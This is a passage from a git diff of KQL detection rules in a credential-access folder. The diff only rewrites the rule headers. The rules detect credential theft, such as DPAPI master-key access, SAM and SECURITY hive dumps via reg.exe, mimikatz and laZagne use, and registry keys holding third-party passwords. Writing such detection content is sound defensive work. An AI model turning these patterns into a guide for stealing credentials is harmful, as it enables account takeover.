"\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql index a1a05860..0a07ab8a 100644 --- a/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql @@ -1,10 +1,10 @@ -// Title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications -// Author: frack113 -// Date: 2023-12-21 -// Level: medium -// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.006 - -DeviceFileEvents +// Title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications +// Author: frack113 +// Date: 2023-12-21 +// Level: medium +// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 + +DeviceFileEvents | where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql index 8b6fa1cc..1ae442a2 100644 --- a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql @@ -1,11 +1,11 @@ -// Title: Access To Windows Credential History File By Uncommon Applications -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-17 -// Level: medium -// Description: Detects file access requests to the Windows Credential History File by an uncommon application. -// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555.004 - -DeviceFileEvents +// Title: Access To Windows Credential History File By Uncommon Applications +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-17 +// Level: medium +// Description: Detects file access requests to the Windows Credential History File by an uncommon application. +// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.004 + +DeviceFileEvents | where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql index 542529f5..631e6f79 100644 --- a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql @@ -1,11 +1,11 @@ -// Title: Access To Windows DPAPI Master Keys By Uncommon Applications -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-17 -// Level: medium -// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. -// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555.004 - -DeviceFileEvents +// Title: Access To Windows DPAPI Master Keys By Uncommon Applications +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-17 +// Level: medium +// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. +// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.004 + +DeviceFileEvents | where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql b/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql index 2f90a1f7..3470364b 100644 --- a/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql +++ b/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql @@ -1,10 +1,10 @@ -// Title: Browser Started with Remote Debugging -// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-27 -// Level: medium -// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.collection, attack.t1185 - -DeviceProcessEvents +// Title: Browser Started with Remote Debugging +// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-27 +// Level: medium +// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.collection, attack.t1185 + +DeviceProcessEvents | where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql b/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql index 5dc13da8..093675d4 100644 --- a/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql +++ b/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql @@ -1,12 +1,12 @@ -// Title: Capture Credentials with Rpcping.exe -// Author: Julia Fomina, oscd.community -// Date: 2020-10-09 -// Level: medium -// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Capture Credentials with Rpcping.exe +// Author: Julia Fomina, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s" or ProcessCommandLine contains "–s" or ProcessCommandLine contains "—s" or ProcessCommandLine contains "―s") and (FolderPath endswith "\\RpcPing.exe" or ProcessVersionInfoOriginalFileName =~ "\\RpcPing.exe")) and ((ProcessCommandLine contains "ncacn_np" and (ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t" or ProcessCommandLine contains "–t" or ProcessCommandLine contains "—t" or ProcessCommandLine contains "―t")) or (ProcessCommandLine contains "NTLM" and (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/certificate_exported_via_powershell.kql b/KQL/rules/Credential Access/certificate_exported_via_powershell.kql index 155368db..a90f4a67 100644 --- a/KQL/rules/Credential Access/certificate_exported_via_powershell.kql +++ b/KQL/rules/Credential Access/certificate_exported_via_powershell.kql @@ -1,12 +1,12 @@ -// Title: Certificate Exported Via PowerShell -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-18 -// Level: medium -// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.execution, attack.t1552.004, attack.t1059.001 -// False Positives: -// - Legitimate certificate exports by administrators. Additional filters might be required. - -DeviceProcessEvents +// Title: Certificate Exported Via PowerShell +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-18 +// Level: medium +// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.execution, attack.t1552.004, attack.t1059.001 +// False Positives: +// - Legitimate certificate exports by administrators. Additional filters might be required. + +DeviceProcessEvents | where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate " \ No newline at end of file diff --git a/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql b/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql index 8121a3b7..c6def7c1 100644 --- a/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql +++ b/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql @@ -1,10 +1,10 @@ -// Title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-27 -// Level: high -// Description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share -// MITRE Tactic: Credential Access -// Tags: attack.credential-access - -DeviceProcessEvents +// Title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: high +// Description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share +// MITRE Tactic: Credential Access +// Tags: attack.credential-access + +DeviceProcessEvents | where ((ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains " \\\\")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql b/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql index 0a42abf5..8bd804dd 100644 --- a/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql +++ b/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql @@ -1,10 +1,10 @@ -// Title: Copy Passwd Or Shadow From TMP Path -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-01-31 -// Level: high -// Description: Detects when the file "passwd" or "shadow" is copied from tmp path -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.001 - -DeviceProcessEvents +// Title: Copy Passwd Or Shadow From TMP Path +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-31 +// Level: high +// Description: Detects when the file "passwd" or "shadow" is copied from tmp path +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "passwd" or ProcessCommandLine contains "shadow") and FolderPath endswith "/cp" and ProcessCommandLine contains "/tmp/" \ No newline at end of file diff --git a/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql b/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql index b8d224e8..f537d536 100644 --- a/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql +++ b/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql @@ -1,12 +1,12 @@ -// Title: Copying Sensitive Files with Credential Data -// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community -// Date: 2019-10-22 -// Level: high -// Description: Files with well-known filenames (sensitive files with credential data) copying -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404 -// False Positives: -// - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator. - -DeviceProcessEvents +// Title: Copying Sensitive Files with Credential Data +// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Files with well-known filenames (sensitive files with credential data) copying +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404 +// False Positives: +// - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator. + +DeviceProcessEvents | where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " -m " or ProcessCommandLine contains " /m " or ProcessCommandLine contains " –m " or ProcessCommandLine contains " —m " or ProcessCommandLine contains " ―m " or ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\security" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") \ No newline at end of file diff --git a/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql b/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql index 15a616e2..ea5eca48 100644 --- a/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql +++ b/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql @@ -1,12 +1,12 @@ -// Title: Cred Dump Tools Dropped Files -// Author: Teymur Kheirkhabarov, oscd.community -// Date: 2019-11-01 -// Level: high -// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005 -// False Positives: -// - Legitimate Administrator using tool for password recovery - -DeviceFileEvents +// Title: Cred Dump Tools Dropped Files +// Author: Teymur Kheirkhabarov, oscd.community +// Date: 2019-11-01 +// Level: high +// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005 +// False Positives: +// - Legitimate Administrator using tool for password recovery + +DeviceFileEvents | where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll") \ No newline at end of file diff --git a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql index 42a3ab11..198e3fad 100644 --- a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql @@ -1,13 +1,13 @@ -// Title: Credential Manager Access By Uncommon Applications -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-11 -// Level: medium -// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault. -// Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function -// MITRE Tactic: Credential Access -// Tags: attack.t1003, attack.credential-access -// False Positives: -// - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason). - -DeviceFileEvents +// Title: Credential Manager Access By Uncommon Applications +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-11 +// Level: medium +// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault. +// Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access +// False Positives: +// - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason). + +DeviceFileEvents | where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql b/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql index cce1fca6..cb3815a2 100644 --- a/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql +++ b/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql @@ -1,12 +1,12 @@ -// Title: Credentials from Password Stores - Keychain -// Author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems) -// Date: 2020-10-19 -// Level: medium -// Description: Detects passwords dumps from Keychain -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555.001 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Credentials from Password Stores - Keychain +// Author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems) +// Date: 2020-10-19 +// Level: medium +// Description: Detects passwords dumps from Keychain +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((ProcessCommandLine contains "find-certificate" or ProcessCommandLine contains " export ") and FolderPath =~ "/usr/bin/security") or (ProcessCommandLine contains " dump-keychain " or ProcessCommandLine contains " login-keychain ") \ No newline at end of file diff --git a/KQL/rules/Credential Access/credentials_in_files.kql b/KQL/rules/Credential Access/credentials_in_files.kql index 1ac52bd4..35401654 100644 --- a/KQL/rules/Credential Access/credentials_in_files.kql +++ b/KQL/rules/Credential Access/credentials_in_files.kql @@ -1,10 +1,10 @@ -// Title: Credentials In Files -// Author: Igor Fits, Mikhail Larin, oscd.community -// Date: 2020-10-19 -// Level: high -// Description: Detecting attempts to extract passwords with grep and laZagne -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.001 - -DeviceProcessEvents +// Title: Credentials In Files +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: high +// Description: Detecting attempts to extract passwords with grep and laZagne +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "password" and FolderPath endswith "/grep") or ProcessCommandLine contains "laZagne" \ No newline at end of file diff --git a/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql index 657873d6..dc4b3d89 100644 --- a/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql +++ b/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql @@ -1,12 +1,12 @@ -// Title: CredUI.DLL Loaded By Uncommon Process -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-10-20 -// Level: medium -// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.collection, attack.t1056.002 -// False Positives: -// - Other legitimate processes loading those DLLs in your environment. - -DeviceImageLoadEvents +// Title: CredUI.DLL Loaded By Uncommon Process +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-20 +// Level: medium +// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.collection, attack.t1056.002 +// False Positives: +// - Other legitimate processes loading those DLLs in your environment. + +DeviceImageLoadEvents | where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql index 886fe412..b8db3552 100644 --- a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql +++ b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql @@ -1,12 +1,12 @@ -// Title: DPAPI Backup Keys And Certificate Export Activity IOC -// Author: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-06-26 -// Level: high -// Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555, attack.t1552.004 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: DPAPI Backup Keys And Certificate Export Activity IOC +// Author: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-26 +// Level: high +// Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555, attack.t1552.004 +// False Positives: +// - Unlikely + +DeviceFileEvents | where (FolderPath contains "ntds_capi_" or FolderPath contains "ntds_legacy_" or FolderPath contains "ntds_unknown_") and (FolderPath endswith ".cer" or FolderPath endswith ".key" or FolderPath endswith ".pfx" or FolderPath endswith ".pvk") \ No newline at end of file diff --git a/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql b/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql index 30d6ab69..abbf891a 100644 --- a/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql +++ b/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: Dumping of Sensitive Hives Via Reg.EXE -// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113 -// Date: 2019-10-22 -// Level: high -// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001 -// False Positives: -// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation - -DeviceProcessEvents +// Title: Dumping of Sensitive Hives Via Reg.EXE +// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113 +// Date: 2019-10-22 +// Level: high +// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001 +// False Positives: +// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation + +DeviceProcessEvents | where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql b/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql index 0f646b54..52766419 100644 --- a/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql +++ b/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql @@ -1,12 +1,12 @@ -// Title: Dumping Process via Sqldumper.exe -// Author: Kirill Kiryanov, oscd.community -// Date: 2020-10-08 -// Level: medium -// Description: Detects process dump via legitimate sqldumper.exe binary -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Legitimate MSSQL Server actions - -DeviceProcessEvents +// Title: Dumping Process via Sqldumper.exe +// Author: Kirill Kiryanov, oscd.community +// Date: 2020-10-08 +// Level: medium +// Description: Detects process dump via legitimate sqldumper.exe binary +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Legitimate MSSQL Server actions + +DeviceProcessEvents | where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql b/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql index ee03e1f5..35b453b9 100644 --- a/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql +++ b/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql @@ -1,10 +1,10 @@ -// Title: Enumeration for 3rd Party Creds From CLI -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-20 -// Level: medium -// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.002 - -DeviceProcessEvents +// Title: Enumeration for 3rd Party Creds From CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.002 + +DeviceProcessEvents | where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" 